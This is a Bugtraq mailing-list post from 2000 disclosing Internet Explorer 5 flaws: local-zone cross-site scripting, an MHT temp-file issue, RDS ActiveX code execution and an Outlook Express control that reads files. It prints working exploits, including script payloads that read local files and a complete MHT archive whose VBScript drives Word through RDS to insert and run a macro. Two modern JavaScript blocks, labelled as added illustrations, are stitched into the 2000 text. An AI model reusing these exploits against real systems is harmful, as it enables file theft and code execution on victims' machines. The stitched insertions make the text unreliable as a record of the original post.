Bugtraq mailing list archives

CSS Exploits + RDS (IE5)


From: s.hird () STUDENT QUT EDU AU (Shane Hird)
Date: Sun, 12 Mar 2000 21:25:15 +1000


<Disclaimed>

All these issues have been disclosed to MS; however, no action has been taken,
so I assume they have decided not to patch the following problems.

Small CSS Overview:

Cross-site scripting issues have been known for quite a while now, in fact
since long before the recent CERT advisory on the matter, and MS have had
security measures in place for this ever since they started displaying custom
local 404 error messages and others.

Taken directly from res://C:\WINDOWS\SYSTEM32\SHDOCLC.DLL/HTTP_404.HTM:

        // Security precaution: must filter out "urlResult" and "displayresult"
        forbiddenChars = new RegExp("[<>\'\"]", "g");   // Global search/replace
        urlresult = urlresult.replace(forbiddenChars, "");
        displayresult = displayresult.replace(forbiddenChars, "");

Obviously, because the page will be displaying remotely defined strings in
the local zone, MS have filtered out 'dangerous' characters, which is fair
enough. Without this security precaution, this page and others could easily
be exploited. In fact, there are certain pages which lack it and are
exploitable, as will be shown later, although they are a minor problem.

MK/RES LFN CSS Bug:

There are a few problems with the RES and MK (and probably other) protocols in
that they don't recognise the Temporary Internet Files directory as the
Internet zone when it is specified in short 8-character format, i.e. the
following will be opened in the 'local' zone, whereas they would normally be
opened in the 'Internet' zone if specified using the LFN (long file name).

"res://C:\Windows\Tempor~1\Content.IE5\XXXXXXX\dllfile.mid/htmlfile.htm"
"mk:@MSITStore:C:\Windows\Tempor~1\Content.IE5\XXXXXXX\chmfile.chm::/htmfile.htm"

This may not be much of an issue, due to the fact that 'XXXXXXXX' is a random
string and pretty much impossible to guess. However, Outlook places TEMP
files in the TEMP directory (not the Temporary Internet Files directory) and
places temp HTM files in the root of the Temporary Internet Files directory,
so it is easy to guess the location. And HTM files can be extracted and
opened (in the 'local' zone) from the likes of MID files, so this can be
exploited in a similar fashion to the Active Setup problem, although it would
simply be a CSS exploit (which can be potentially serious, see later). There
are various ways of exploiting this through Outlook using various protocols
and file formats etc.; I won't list them here, but basically, using a random
Temporary Internet Files directory instead of a local temp directory would
solve most of the problems.

Web Accessories CSS Bug:

MS have released extensions to IE that allow viewing an image list, URL list
and document tree, among other things. These extensions are essentially just
HTM files which parse the current HTM file and display the results using
script, and they are shown in the local zone. Immediately one realises that
this can be exploited if we can define the strings which are displayed, which
we can. Each of the snippets below will display a text file when the
corresponding extension is used on the current HTM file. This is a typical
CSS bug, which can be exploited further with the use of RDS, see later.

Document Tree Exploit:
<OBJECT ID="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>"  CLASSID="CLSID:0"></OBJECT>

URL List Exploit:
<a href="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>"></a>

Image List Exploit:
<IMG src="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>">
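As an added illustration (not code from the original post or from SHDOCLC.DLL), here are the two ways a local-zone listing page can neutralise values scraped from an untrusted document: the character-stripping filter quoted from HTTP_404.HTM above, beside the output encoding the Web Accessories pages would need before writing collected src/href values into their own document. All function names and the sample hrefs are assumed for the example.

```javascript
// Added example (not from the original post or from SHDOCLC.DLL): the two
// ways a local-zone listing page can neutralise values scraped from an
// untrusted document. All function names are assumed for this example.

// The SHDOCLC.DLL approach quoted above: delete the four characters that can
// open a tag or end a quoted attribute. Lossy, but leaves nothing to inject.
function stripForbidden(value) {
  return value.replace(/[<>'"]/g, "");
}

// Output encoding instead: keep the value intact but make each
// markup-significant character inert in text and double-quoted attributes.
const ENTITY = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(value) {
  return value.replace(/[&<>"']/g, (c) => ENTITY[c]);
}

// What an Image/URL List page should do before writing scraped src/href
// values into its own (local-zone) document: encode every one of them.
function renderList(values) {
  return "<ul>" + values.map((v) =>
    '<li><a href="' + escapeHtml(v) + '">' + escapeHtml(v) + "</a></li>"
  ).join("") + "</ul>";
}

// Quick check on the rendered page: no tag of the given name survived encoding.
function containsRawTag(html, tagName) {
  return new RegExp("<" + tagName + "\\b", "i").test(html);
}

// Constructed sample input: the href from the "URL List Exploit" above, plus
// a benign link whose quotes a strip-only filter would silently destroy.
const SAMPLE_HREFS = [
  "<SCRIPT>a=window.open('file://c:/test.txt');alert(a.document.body.innerText);</SCRIPT>",
  "http://example.test/search?q=\"O'Reilly\"&lang=en",
];
```

Stripping keeps the page safe but changes the data it shows; encoding keeps both properties, which is why it is the right fix for a listing page.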

MHT Temp File CSS Bug:

A typical temp file vulnerability. IE5 (or one of them) introduced the new
'Web Archive' format for storing web pages, which have the extension MHT.
IE5 essentially takes each file which is needed for display of the page and
encodes them sequentially into a single MHT file in the format of a MIME
message, 7bit and Base64 encoding and all; it even has a 'From:' field. (This,
by the way, makes it difficult to send and receive MHT attachments, because
Outlook, or perhaps the mail server, converts it into MSG format, completely
destroying the original file.)

When parsing the MHT file, IE extracts each file and places it into a single
locked TMP file; however, if the file referenced is in a FRAME or an IFRAME,
the file is extracted and placed into its own unlocked file in the local
temp directory, with guessable names, in fact even definable names. An
example exploit is included with the note about RDS.

RDS ActiveX Control Bug:

A new ActiveX control, I think included with Visual Studio and probably IIS
and other databasey type applications :). Anyway, when invoked in the local
zone one can avoid the 'ActiveX' warning by creating business objects via
DCOM using IP 127.0.0.1 instead of 'in-process', and from there take
practically any action, with permissions dependent on the current DCOM
settings and current user. I believe this works on default configurations of
any Win machine with RDS installed.

This example fires up MS Word and runs a custom macro, from which you can
take any action at all. The example is included as part of the MHT exploit,
which will extract a file to the temp directory and open it. Hopefully this
won't get stuffed up by any 'smart' mail server.

<------------------------ snip MHTExp.MHT --------------------->

From: <Saved by Microsoft Internet Explorer 5>
Subject: MHT Exploit
Date: Thu, 17 Feb 2000 19:31:45 +1000
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0000_01BF797D.A014BDD0"
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01BF797D.A014BDD0
Content-Type: text/html;
        charset="Windows-1252"
Content-Transfer-Encoding: 7bit
Content-Location: MHTEXploit

<html>
<head>
<title>MHT Exploit</title>
</head>

<frameset cols="*">
        <frame name="local" src="file:Exploit.htm">
</frameset>
</html>

------=_NextPart_000_0000_01BF797D.A014BDD0
Content-Type: text/html;
        charset="Windows-1252"
Content-Transfer-Encoding: 7bit
Content-Location: file:Exploit.htm

<HTML>

<script language="VBScript"><!--

if location.protocol <> "file:" then
        document.writeln("Exploiting MHT temp file vuln - Shane Hird")

        'Note - Replace with required temp directory.

        window.open("file://C:\Documents and Settings\Shane\Local Settings\Temp\Exploit.htm")

else
        msgbox("Running in local context")
        set rds = CreateObject("RDS.DataSpace")
        set busobj = rds.CreateObject("Word.Application", "127.0.0.1")
        busobj.visible = TRUE
        Set NT = busobj.Templates(1).VBProject.VBComponents(1).CodeModule
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, "Public Sub Example()"
        NT.InsertLines 2, "     MsgBox (" + Chr(34) + "Example Code..." + Chr(34) + ")"
        NT.InsertLines 3, "End Sub"
        busobj.run "Normal.ThisDocument.Example"
        NT.DeleteLines 1, NT.CountOfLines
        set NT = Nothing
        busobj.quit
        window.close
end if

--></script>

------=_NextPart_000_0000_01BF797D.A014BDD0--

<---------------- snip MHTExp.mht ------------------->
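As an added check (not code from the original post), this parser treats an MHT archive as the MIME multipart described in the MHT Temp File section and lists the parts that a FRAME or IFRAME src names, i.e. the ones that are extracted to their own unlocked temp file, flagging those whose Content-Location is a file: URL. Function names are assumed, a frame src is matched against Content-Location by exact string, and the sample archive is constructed with the same layout as MHTExp.MHT but a harmless framed part.

```javascript
// Added example (not the post's code): parse an MHT archive as the MIME multipart
// described above and report the parts a frame points at. Names are assumed.
function parseMhtParts(mht) {
  const text = mht.replace(/\r\n/g, "\n");
  const b = /boundary="?([^"\n;]+)"?/i.exec(text);
  if (!b) throw new Error("no multipart boundary in top-level headers");
  return text.split("--" + b[1]).slice(1)         // drop top-level headers
    .filter((p) => !p.startsWith("--"))           // drop closing delimiter
    .map((p) => {
      const cut = p.indexOf("\n\n");              // blank line ends part headers
      const head = cut < 0 ? "" : p.slice(0, cut).replace(/\n[ \t]+/g, " ");
      const loc = /^Content-Location:\s*(.+)$/im.exec(head);
      return { location: loc ? loc[1].trim() : "", body: cut < 0 ? p : p.slice(cut + 2) };
    });
}

// Every src referenced from a <frame> or <iframe> in any part of the archive.
function framedSources(parts) {
  const re = /<i?frame\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  const srcs = new Set();
  for (const { body } of parts) {
    let m;
    while ((m = re.exec(body)) !== null) srcs.add(m[1]);
  }
  return srcs;
}

// Parts that a frame names are written to a separate, unlocked temp file; a
// file: Content-Location additionally lets the archive choose that file name.
function findFramedParts(mht) {
  const parts = parseMhtParts(mht);
  const srcs = framedSources(parts);
  return parts
    .filter((p) => srcs.has(p.location))
    .map((p) => ({ location: p.location, fileScheme: /^file:/i.test(p.location) }));
}

// Constructed sample with the same layout as MHTExp.MHT above but a harmless framed part.
const SAMPLE_MHT = [
  "MIME-Version: 1.0", "Content-Type: multipart/alternative;",
  '\tboundary="----=_Part_0"', "", "------=_Part_0",
  "Content-Type: text/html;", '\tcharset="Windows-1252"', "Content-Location: MHTSample", "",
  '<html><frameset cols="*"><frame name="local" src="file:Sample.htm"></frameset></html>',
  "", "------=_Part_0", "Content-Type: text/html", "Content-Location: file:Sample.htm", "",
  "<html><body>framed part</body></html>", "", "------=_Part_0--", "",
].join("\r\n");
```

Run findFramedParts over an archive before opening it; any part reported with fileScheme true is one whose on-disk name the archive author has chosen.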

Outlook Express ActiveX Exploit:

There is also this old exploit, which apparently got fixed in IE5 but was
never announced. It will allow reading of any file on the user's machine
(after the first newline of the file) using an ActiveX control provided by
Outlook Express.

<object id="MIME" classid="clsid:1C82EAD9-508E-11D1-8DCF-00C04FB951F9"
width="500" height="150"></object>

<script language="Vbscript"><!--

msgbox("Please wait while control is loaded..." + Chr(10) + "Outlook Express MIME Editor Exploit" + Chr(10) + "Written by: Shane Hird")
MIME.src="C:\test.txt"
msgbox("File Loaded")
document.write("<P>File is displayed below</P><HR><PRE>")
document.write(MIME.messagesource)

--></script>

End:

I think that's all of them. Excuse the mess, and the fact that they're all
compiled into one message, but they're all kind of related and I didn't
think they deserved their own individual post.

-Shane Hird             s.hird () student qut edu au

